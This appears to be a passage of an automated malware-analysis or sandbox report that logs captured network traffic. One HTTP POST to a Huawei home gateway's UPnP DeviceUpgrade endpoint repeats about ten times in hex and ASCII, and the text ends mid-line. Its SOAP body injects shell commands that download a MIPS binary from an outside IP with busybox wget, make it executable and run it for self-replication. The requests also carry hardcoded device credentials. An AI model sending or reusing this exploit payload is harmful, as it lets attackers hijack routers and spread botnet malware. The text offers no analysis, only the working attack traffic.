/tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 